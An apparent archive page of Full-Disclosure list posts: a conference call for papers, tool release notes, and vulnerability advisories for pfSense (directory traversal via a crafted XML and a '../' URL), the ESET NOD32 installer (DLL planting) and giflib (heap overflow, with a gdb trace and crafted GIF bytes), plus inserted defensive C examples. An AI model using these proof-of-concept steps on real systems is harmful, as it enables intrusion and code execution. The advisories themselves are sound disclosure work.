[FD] Call for Papers -YSTS X - Information Security Conference, Brazil

2015-12-21 Thread Luiz Eduardo
Hello Full-Disclosure readers, and sorry for the possible cross-postings you
might see. On behalf of the conference's organization team I would like to
let you know that YSTS X's CFP is currently open.


YSTS 10th Edition

Where: Sao Paulo, Brazil

When:  June 13th, 2016

Call for Papers Opens: December 13th, 2015

Call for Papers Close: March 1st, 2016

http://www.ysts.org

@ystscon

INTRODUCTION

This is the celebratory 10th edition of the well-known information security
conference “you Sh0t the Sheriff”, and we are sending this CFP out so you
can share with us the coolest stuff you've been working on.

The conference will be happening on June 13th in a secret location within
the city of Sao Paulo, Brazil. This is a great opportunity for you to speak
about the latest research you have been working on to the most influential
crowd in the Brazilian Information Security realm.

ABOUT THE CONFERENCE

you Sh0t the Sheriff is a very unique one-day event dedicated to bringing
cutting-edge talks to the top-notch professionals of the Brazilian
Information Security Community.

The conference’s main goal is to bring the attendees to the current state
of the information security world by bringing the most relevant topics from
different Infosec segments of the market and providing an environment that
is ideal for both networking and idea sharing.

YSTS is an exclusive, mostly invite-only security con.
Getting a talk accepted will not only get you to the event; after you
successfully present your talk, you will receive a challenge-coin that
guarantees your entry to YSTS for as long as the conference exists.

Due to the great success of the previous years' editions, yes, we're
keeping the good old usual format:

* YSTS 10 will be held at an almost secret location only announced to whom
it may concern a couple of weeks before the con

* the venue will be, most likely, a very cool club or a bar
(seriously, look at the pictures)

* appropriate environment to network with great security folks from
Brazil and abroad

* since it is a one-day con with tons of talks and activities, we make sure
we fill everyone with coffee, food and booze

CONFERENCE FORMAT

Anything Information Security related is interesting for the conference,
which will help us create a cool and diverse line-up.
We strictly *do not* accept commercial/product-related pitches.
Keep in mind though, this is a one-day conference and we receive a lot of
submissions, so your unique research with cool demos and any other
possible twist you can throw in to keep the audience engaged will surely
stand out from the other papers.

Just in case you need some ideas, some of the topics in security that could
be interesting to us:

* Mobile Devices & BY0D - Bring your 0wn3d Device

* Real Social Networking Threats

* Embedded Systems

* Everything in Offensive Security

* "the" Cloud

* Inside Jobs Detection/ Techniques

* Big Data

* Small Data

* Tiny Data (the type that breaks big things)

* Internet of all the things you can break

* Career & Management topics

* (cool and useful) Information Security Policies

* Privacy in the Digital World

* Messing with Network Protocols

* RF Stuff

* Mobile Payments

* Authentication

* Incident Response Stories and Policies

* Information Warfare

* Malware/ Botnets

* DDoS Evolution or Stories (or solution, if you have one)

* Secure Programming

* Hacker Culture

* Application Security

* Virtualization

* DataBase Security

* Cryptography

* System Weaknesses

* Infrastructure and Critical Systems

* Reverse Engineering

* Social Reverse Engineering

* Reversing Social Engineering

* Caipirinha and Feijoada Hacks

* and everything else information security related that our attendees
would enjoy; the coolest/different/most creative submissions win,
keep that in mind!

We do like shorter talks, so please submit your talks and remember
they must be 30 minutes long (yes, we do strictly enforce that).

We are also open to some 15-minute talks; some of the smart people
around might not need 30 minutes to deliver a message, or it might be
a project that has just been kicked off.

15 minutes might be your thing and that's nothing to be ashamed about.

you Sh0t the Sheriff is the perfect conference to release your new
projects; other people have released very cool research before they
presented it at the bigger cons later in the year. We also like that,
a lot.

And yes, we do prefer new hot-topics. "First-time" speakers are more
than welcome.

If you’ve got good content to present, that's all that matters.

SPEAKER PRIVILEGES

(and yeah, that applies only to the 30-minute-long talks)

* USD 1,000.00 to help cover travel expenses for international speakers

* or R$ 1,200.00 to help cover travel expenses for Brazilian
speakers who live outside of Sao Paulo

* Breakfast, lunch and dinner during conference

* Pre-and-post-conference official party (and the unofficial ones as well)

* Auditing products in traditional 

Re: [FD] PFSense <= 2.2.5 Directory Traversal

2015-12-21 Thread Bacon Zombie
For the lazy:
# Title : PFSense  <= 2.2.5 Directory Traversal
# Date : 18/12/2015
# Author : R-73eN
# Tested on : PFSense 2.2.5
# Software : https://github.com/pfsense/pfsense
# Vendor : https://pfsense.org/
#  _____ __
# |_ _|_ __  / _| ___  / ___| ___ _ __  / \  | |
#  | || '_ \| |_ / _ \| |  _ / _ \ '_ \/ _ \ | |
#  | || | | |  _| (_) | |_| |  __/ | | |  / ___ \| |___
# |___|_| |_|_|  \___/ \|\___|_| |_| /_/   \_\_|
#
#
# Fix provided by the vendor
https://github.com/pfsense/pfsense/commit/3ac0284805ce357552c3ccaeff0a9aadd0c6ea13
#
#

In pfsense <= 2.2.5 (Latest Version), during a security audit I discovered
the following vulnerabilities in the pfsense Webgui.

The following files are vulnerable to a file inclusion attack

wizard.php?xml=
pkg.php?xml=

Both of these files do not sanitize the path of the xml parameter, so we can
load xml files, and by loading a specially crafted xml file we can gain
command execution.

Example:
1.xml (the filename can be whatever .txt , .jpg etc because it does not
check for the file extension)

The content of the 1.xml should be:



12

1
LFI example 
Lfi example 
on
step1_submitphpaction();
/etc/passwd



the parameter  is passed to a require_once() function which
triggers the File inclusion Attack.
As we all know, a file inclusion attack can be converted to RCE very easily.

Then visiting

http://vulnhost/wizard.php?xml=../../../1.xml

where the "xml" parameter is the path of the crafted file, will trigger the
vulnerability.

Thanks
Rio Sherri
https://www.infogen.al/ - Infogen AL
On Dec 18, 2015 6:27 PM, "Rio Sherri"  wrote:


___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
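The root cause reported above is that the `xml` parameter reaches `require_once()` without any check on where the path resolves. The following is an added example, not pfSense's code and not the vendor's fix linked in the advisory: a lexical containment check that normalises a user-supplied relative path, rejects anything absolute or anything that climbs above the allowed directory with `..`, and then requires the `.xml` extension the loader actually needs (the post notes the extension was never checked). The base directory `/usr/local/www/wizards` and the function names are assumptions made for the example.

```c
/*
 * Added example (not pfSense code): lexical path containment for a
 * user-controlled relative path such as the "xml" parameter.
 * Base directory and function names are assumptions for illustration.
 */
#include <stdio.h>
#include <string.h>

#define MAX_SEGS 64

/*
 * Normalise `rel` lexically ("." and ".." segments, repeated slashes) and
 * write "<base>/<normalised>" into out. Returns 1 if the path stays inside
 * base, 0 if it is rejected (empty, absolute, escapes via "..", too long).
 */
int resolve_within_base(const char *base, const char *rel,
                        char *out, size_t outlen)
{
    const char *segs[MAX_SEGS];
    size_t seglen[MAX_SEGS];
    int nsegs = 0;

    if (rel == NULL || rel[0] == '\0' || rel[0] == '/')
        return 0;                          /* empty or absolute: reject */

    const char *p = rel;
    while (*p) {
        const char *start = p;
        while (*p && *p != '/') p++;
        size_t len = (size_t)(p - start);
        if (*p == '/') p++;                /* skip the separator */

        if (len == 0 || (len == 1 && start[0] == '.'))
            continue;                      /* "//" or "." is a no-op */
        if (len == 2 && start[0] == '.' && start[1] == '.') {
            if (nsegs == 0)
                return 0;                  /* would climb above base */
            nsegs--;
            continue;
        }
        if (nsegs == MAX_SEGS)
            return 0;
        segs[nsegs] = start;
        seglen[nsegs] = len;
        nsegs++;
    }
    if (nsegs == 0)
        return 0;                          /* resolves to base itself */

    /* Rebuild the path under base, refusing to overflow `out`. */
    size_t used = strlen(base);
    if (used + 1 > outlen) return 0;
    memcpy(out, base, used);
    for (int i = 0; i < nsegs; i++) {
        if (used + 1 + seglen[i] + 1 > outlen) return 0;
        out[used++] = '/';
        memcpy(out + used, segs[i], seglen[i]);
        used += seglen[i];
    }
    out[used] = '\0';
    return 1;
}

/* Second gate: the wizard loader only ever needs .xml files. */
int has_xml_extension(const char *path)
{
    size_t n = strlen(path);
    return n > 4 && strcmp(path + n - 4, ".xml") == 0;
}

/* Combined check for the "xml" parameter: 1 = safe to load, 0 = reject. */
int safe_wizard_path(const char *param, char *out, size_t outlen)
{
    /* assumed wizard directory; adjust for the real deployment */
    return resolve_within_base("/usr/local/www/wizards", param, out, outlen)
        && has_xml_extension(out);
}

int main(void)
{
    const char *inputs[] = {
        "openvpn_wizard.xml",   /* constructed legitimate name */
        "../../../1.xml",       /* the traversal shown in the advisory */
        "sub/../setup.xml",     /* ".." that still stays inside base */
        "setup.txt",            /* wrong extension */
    };
    char buf[256];
    for (size_t i = 0; i < sizeof inputs / sizeof inputs[0]; i++) {
        int ok = safe_wizard_path(inputs[i], buf, sizeof buf);
        printf("%-22s -> %s %s\n", inputs[i], ok ? "allow " : "reject",
               ok ? buf : "");
    }
    return 0;
}
```

The check is purely lexical, so it says nothing about symlinks inside the base directory; in PHP the equivalent gate is `realpath()` on the joined path followed by a prefix comparison against the realpath of the base, which also covers that case.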


[FD] Executable installers are vulnerable^WEVIL (case 13): ESET NOD32 antivirus installer allows remote code execution with escalation of privilege

2015-12-21 Thread Stefan Kanthak
Hi @ll,

the executable installer [°] of ESET's NOD32 antivirus,
eset_nod32_antivirus_live_installer_.exe, loads and executes
(at least) the rogue/bogus/malicious Cabinet.dll and DbgHelp.dll
eventually found in the directory it is started from ['] (the
"application directory").

For software downloaded with a web browser this is typically the
"Downloads" directory: see
,

and 

If Cabinet.dll or DbgHelp.dll get planted in the user's "Downloads"
directory per "drive-by download" (or "social engineering") this
vulnerability becomes a remote code execution.

Due to the application manifest embedded in the executable which
specifies "requireAdministrator" the installer is started with
administrative privileges ("protected" administrators are prompted
for consent, unprivileged standard users are prompted for an
administrator password); execution of Cabinet.dll or DbgHelp.dll
then results in an escalation of privilege!


Proof of concept/demonstration:
~~~

(verified on Windows XP, Windows Vista, Windows 7, Windows Server
2008 [R2]; should work on newer versions too)

1. visit , download
    and store
   it as Cabinet.dll in your "Downloads" directory, then copy it as
   DbgHelp.dll;

2. download eset_nod32_antivirus_live_installer_.exe and store it in
   your "Downloads" directory;

3. run eset_nod32_antivirus_live_installer_.exe from your "Downloads"
   directory;

4. notice the message boxes displayed from the DLLs placed in step 1.

PWNED!


Unsuspecting users who follow the guidance on ESET's web site


| (1) Download the .exe file to your computer and double-click
| it to start installation.

are the typical victims!

JFTR: I REALLY love (especially snakeoil) companies which don't
  protect or at least warn their customers from even the most
  trivial handling errors!


See  plus
 and the still unfinished
 for more details and why
executable installers (and self-extractors too) are bad.


Mitigation(s):
~~

0. DON'T USE EXECUTABLE INSTALLERS [°]!

   If your favourite applications are not distributed in the native
   installer package format of the resp. target platform: ask^WURGE
   their vendors/developers to provide native installation packages.
   If they don't: dump these applications, stay away from such cruft!

1. Turn off UAC's privilege elevation for standard users and installer
   detection for all users:

   
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System]
   "ConsentPromptBehaviorUser"=dword: ; Automatically deny elevation 
requests
   "EnableInstallerDetection"=dword:

   See 


2. NEVER execute files in UNSAFE directories (like "Downloads" and
   "%TEMP%")!

3. Deny execution (at least) in the "Downloads" directories and all
   "%TEMP%" directories and their subdirectories:

   * Add the NTFS ACE "(D;OIIO;WP;;;WD)" meaning "deny execution of
     files in this directory for everyone, inheritable to all files
     in all subdirectories" (use CACLS.EXE /S: for example);

   * Use "software restriction policies" resp. AppLocker.

   Consider applying either/both to every "%USERPROFILE%" as well as
   "%ALLUSERSPROFILE%" alias "%ProgramData%" and "%PUBLIC%": Windows
   doesn't place executables in these directories and beyond.

   See  as well as
    plus
   ,
   

   or  and finally
   !


stay tuned
Stefan Kanthak


[°] Self-extracting archives and executable installers are flawed^W
b(rainde)ad in concept and dangerous in practice.

DON'T USE SUCH CRUFT!
ALWAYS use the resp. target platform's native package and archive
format.

For Windows these are .INF (plus .CAB) and .MSI (plus .CAB),
introduced 20 years ago (with Windows 95 and Windows NT4) resp.
16 years ago (with Office 2000).

Both .INF and .MSI are "opened" by programs residing in
%SystemRoot%\System32\ which are therefore immune to this kind
of "DLL and EXE Search Order Hijacking" attack.
Since both .INF and .MSI access the contents of .CAB directly
they eliminate the attack vector "unsafe temporary 

[FD] Faraday v1.0.16: (Group vulns by fields, Filter false-positives, Canvas plugin)

2015-12-21 Thread Francisco Amato
We are proud to present Faraday v1.0.16!

This version comes with major changes to our Web UI, including the
possibility to mark vulnerabilities as false positives. You can now
create an Executive Report using only confirmed vulnerabilities,
saving you even more time.

A brand new feature that comes with v1.0.16 is the ability to group
vulnerabilities by any field in our Status Report view. Combine it
with bulk edit to manage your findings faster than ever!

This release also features several new features developed entirely by
our community.

Changes:
* Added group vulnerabilities by any field in our Status Report
* Added port to Service type target in new vuln modal
* Filter false-positives in Dashboard, Status Report and Executive Report
- Filter in Status Report view
* Added Wiki information about running Faraday without configuring
CouchDB https://github.com/infobyte/faraday/wiki/APIs
* Added parametrization for port configuration on APIs
* Added scripts to:
- get all IPs from targets that have no services
(/bin/getAllIpsNotServices.py)
- get all IP addresses that have defined open port
(/bin/getAllbySrv.py) and get all IPs from targets without services
(/bin/delAllVulnsWith.py)
It's important to note that both these scripts hold a
variable that you can modify to alter its behaviour.
/bin/getAllbySrv.py has a port variable set to 8080 by default.
/bin/delAllVulnsWith.py does the same with a RegExp
* Added three Plugins:
- Immunity Canvas
- Dig
- Traceroute
* Refactor Plugin Base to update active WS name in var
* Refactor Plugins to use current WS in temp filename under
$HOME/.faraday/data. Affected Plugins:
- amap
- dnsmap
- nmap
- sslcheck
- wcscan
- webfuzzer
- nikto

Bug fixes:
* When the last workspace was null Faraday wouldn't start
* CSV export/import in QT
* Fixed bug that prevented the use of "reports" and "cwe" strings in
Workspace names
* Unicode support in Nexpose-full Plugin
* Fixed bug get_installed_distributions from handler exceptions
* Fixed bug in first run of Faraday with log path and API errors

More information:
https://github.com/infobyte/faraday
http://blog.infobytesec.com/2015/12/presenting-faraday-1016.html



[FD] giflib: heap overflow in giffix (CVE-2015-7555)

2015-12-21 Thread Hans Jerry Illikainen

About
=====

giflib[1] is a library for working with GIF images.  It also provides
several command-line utilities.


CVE-2015-7555
=============

A heap overflow may occur in the giffix utility included in giflib-5.1.1
when processing records of the type `IMAGE_DESC_RECORD_TYPE' due to the
allocated size of `LineBuffer' equaling the value of the logical screen
width, `GifFileIn->SWidth', while subsequently having
`GifFileIn->Image.Width' bytes of data written to it.
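The mismatch described above (buffer sized from `SWidth`, writes sized from `Image.Width`) is easy to see with a few bytes of input. The following is an added example, not giflib code and not the upstream fix: a minimal parser that recovers the logical screen width and the first image descriptor's width from a GIF stream, plus the bounds check that the giffix filler loop lacks. The sample bytes are constructed here to match the values the advisory reports (`SWidth` = 1, image width = 255); the structure and function names are the example's own.

```c
/*
 * Added example, not giflib code: recover SWidth and the first image's
 * width from a GIF stream and refuse to fill a line buffer that is too
 * small for the image. Struct and function names are the example's own.
 */
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define IMAGE_DESC_RECORD 0x2c   /* ',' : image descriptor introducer */

struct gif_dims {
    unsigned screen_width;   /* SWidth, from the logical screen descriptor */
    unsigned image_width;    /* Image.Width, from the first image descriptor */
};

static unsigned le16(const uint8_t *p) { return p[0] | (p[1] << 8); }

/*
 * Parse just enough of a GIF87a/89a stream to recover SWidth and the
 * first image's width. Returns 0 on success, -1 on truncated input or
 * when the first block after the header is not an image descriptor.
 */
int gif_read_dims(const uint8_t *buf, size_t len, struct gif_dims *d)
{
    size_t off;
    if (len < 13 || memcmp(buf, "GIF8", 4) != 0)
        return -1;
    off = 6;                                   /* "GIF87a" / "GIF89a" */
    d->screen_width = le16(buf + off);         /* SWidth */
    off += 4;                                  /* SWidth, SHeight */
    uint8_t packed = buf[off++];               /* GCT flag + size bits */
    off += 2;                                  /* background, aspect */
    if (packed & 0x80)                         /* global colour table */
        off += 3u * (1u << ((packed & 0x07) + 1));
    if (off + 10 > len || buf[off] != IMAGE_DESC_RECORD)
        return -1;
    off += 1 + 4;                              /* introducer, left, top */
    d->image_width = le16(buf + off);
    return 0;
}

/*
 * The giffix filler loop with the missing check: never write more bytes
 * than the buffer holds. Returns bytes written, or -1 if refused.
 */
long fill_line(uint8_t *line, size_t line_cap, unsigned width, uint8_t color)
{
    if (width > line_cap)
        return -1;      /* Image.Width > SWidth: would overflow LineBuffer */
    memset(line, color, width);
    return (long)width;
}

/*
 * Constructed sample matching the values in the advisory: SWidth = 1,
 * a 2-entry global colour table, then an image descriptor of width 255.
 */
const uint8_t sample_gif[] = {
    'G','I','F','8','7','a',
    0x01,0x00, 0x01,0x00,            /* SWidth = 1, SHeight = 1 */
    0x80, 0x00, 0x00,                /* GCT flag, 2 colours; bg; aspect */
    0x11,0x11,0x11, 0x00,0x00,0x00,  /* global colour table */
    0x2c,                            /* image descriptor */
    0x00,0x00, 0x00,0x00,            /* left, top */
    0xff,0x00, 0x01,0x00,            /* width = 255, height = 1 */
    0x00,                            /* packed: no local colour table */
};

/* 1 if the first image fits a buffer sized from SWidth, else 0. */
int sample_is_safe(void)
{
    struct gif_dims d;
    if (gif_read_dims(sample_gif, sizeof sample_gif, &d) != 0)
        return 0;
    uint8_t *line = malloc(d.screen_width ? d.screen_width : 1);
    if (!line)
        return 0;
    long n = fill_line(line, d.screen_width, d.image_width, 0x01);
    free(line);
    return n >= 0;
}

int main(void)
{
    struct gif_dims d;
    if (gif_read_dims(sample_gif, sizeof sample_gif, &d) == 0)
        printf("SWidth=%u Image.Width=%u -> %s\n", d.screen_width,
               d.image_width, sample_is_safe() ? "ok" : "rejected");
    return 0;
}
```

Allocating `LineBuffer` from the larger of `SWidth` and `Image.Width` (or from `Image.Width` per image) would remove the mismatch altogether; the explicit check above is the version that also makes the bad input visible in a log.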


giflib-5.1.1/util/giffix.c #35..194:
,
| int main(int argc, char **argv)
| {
|     [...]
|     if ((LineBuffer = (GifRowType) malloc(GifFileIn->SWidth)) == NULL)
|         GIF_EXIT("Failed to allocate memory required, aborted.");
|
|     /* Scan the content of the GIF file and load the image(s) in: */
|     do {
|         [...]
|         switch (RecordType) {
|         case IMAGE_DESC_RECORD_TYPE:
|             if (DGifGetImageDesc(GifFileIn) == GIF_ERROR)
|                 QuitGifError(GifFileIn, GifFileOut);
|             [...]
|             Width = GifFileIn->Image.Width;
|             Height = GifFileIn->Image.Height;
|             [...]
|             /* Find the darkest color in color map to use as a filler. */
|             ColorMap = (GifFileIn->Image.ColorMap ? GifFileIn->Image.ColorMap :
|                         GifFileIn->SColorMap);
|             for (i = 0; i < ColorMap->ColorCount; i++) {
|                 j = ((int) ColorMap->Colors[i].Red) * 30 +
|                     ((int) ColorMap->Colors[i].Green) * 59 +
|                     ((int) ColorMap->Colors[i].Blue) * 11;
|                 if (j < ColorIntens) {
|                     ColorIntens = j;
|                     DarkestColor = i;
|                 }
|             }
|
|             /* Load the image, and dump it. */
|             for (i = 0; i < Height; i++) {
|                 GifQprintf("\b\b\b\b%-4d", i);
|                 if (DGifGetLine(GifFileIn, LineBuffer, Width)
|                     == GIF_ERROR) break;
|                 if (EGifPutLine(GifFileOut, LineBuffer, Width)
|                     == GIF_ERROR) QuitGifError(GifFileIn, GifFileOut);
|             }
|
|             if (i < Height) {
|                 [...]
|                 /* Fill in with the darkest color in color map. */
|                 for (j = 0; j < Width; j++)
|                     LineBuffer[j] = DarkestColor;
|                 for (; i < Height; i++)
|                     if (EGifPutLine(GifFileOut, LineBuffer, Width)
|                         == GIF_ERROR) QuitGifError(GifFileIn, GifFileOut);
|             }
|             break;
|         [...]
|         }
|     }
|     while (RecordType != TERMINATE_RECORD_TYPE);
|     [...]
| }
`

,
| $ gdb -q --args ./giffix heap.gif
| Reading symbols from ./giffix...done.
| (gdb) b util/giffix.c:94
| Breakpoint 1 at 0x401131: file giffix.c, line 94.
| (gdb) b util/giffix.c:148
| Breakpoint 2 at 0x401449: file giffix.c, line 148.
| (gdb) b util/giffix.c:149
| Breakpoint 3 at 0x401452: file giffix.c, line 149.
| 
| (gdb) commands 3
| Type commands for breakpoint(s) 3, one per line.
| End with a line saying just "end".
| >printf "%p, 0x%02x\n", LineBuffer+j, DarkestColor
| >c
| >end
| 
| (gdb) r
| [...]
| Breakpoint 1, main (argc=2, argv=0x7fffe6b8) at giffix.c:94
| 94  if ((LineBuffer = (GifRowType) malloc(GifFileIn->SWidth)) == NULL)
| 
| (gdb) p GifFileIn->SWidth
| $1 = 1
| 
| (gdb) c
| [...]
| Breakpoint 2, main (argc=2, argv=0x7fffe6b8) at giffix.c:148
| 148 for (j = 0; j < Width; j++)
| 
| (gdb) p Width
| $2 = 255
| 
| (gdb) c
| Continuing.
| 
| Breakpoint 3, main (argc=2, argv=0x7fffe6b8) at giffix.c:149
| 149 LineBuffer[j] = DarkestColor;
| 0x618920, 0x01
| 
| [...]
| 
| Breakpoint 3, main (argc=2, argv=0x7fffe6b8) at giffix.c:149
| 149 LineBuffer[j] = DarkestColor;
| 0x618940, 0x01
| 
| [...]
| 
| Breakpoint 3, main (argc=2, argv=0x7fffe6b8) at giffix.c:149
| 149 LineBuffer[j] = DarkestColor;
| 0x618a1e, 0x01
| 
| Program received signal SIGSEGV, Segmentation fault.
| 0x77bd8658 in GifFreeMapObject (Object=0x101010101010101) at gifalloc.c:80
| 80  (void)free(Object->Colors);
`


heap.gif:
,
| unsigned char heap[] = {
| /* GIF87a */
| 0x47, 0x49, 0x46, 0x38, 0x37, 0x61,
| 
| /* DGifGetScreenDesc() */
| 0x01, 0x00, /* GifFile->SWidth */
| 0x01, 0x00, /* GifFile->SHeight */
| 0x80,   /* ColorCount = 1 << ((this & 0x07) + 1) */
| 0x00,   /* GifFile->SBackGroundColor */
| 0x00,   /* GifFile->AspectByte */
| 0x11, 0x11, 0x11,   /* GifFile->SColorMap->Colors[0] */
| 0x00, 0x00, 0x00,   /* GifFile->SColorMap->Colors[1] */
| 
| /* DGifGetRecordType() */
| 0x2c,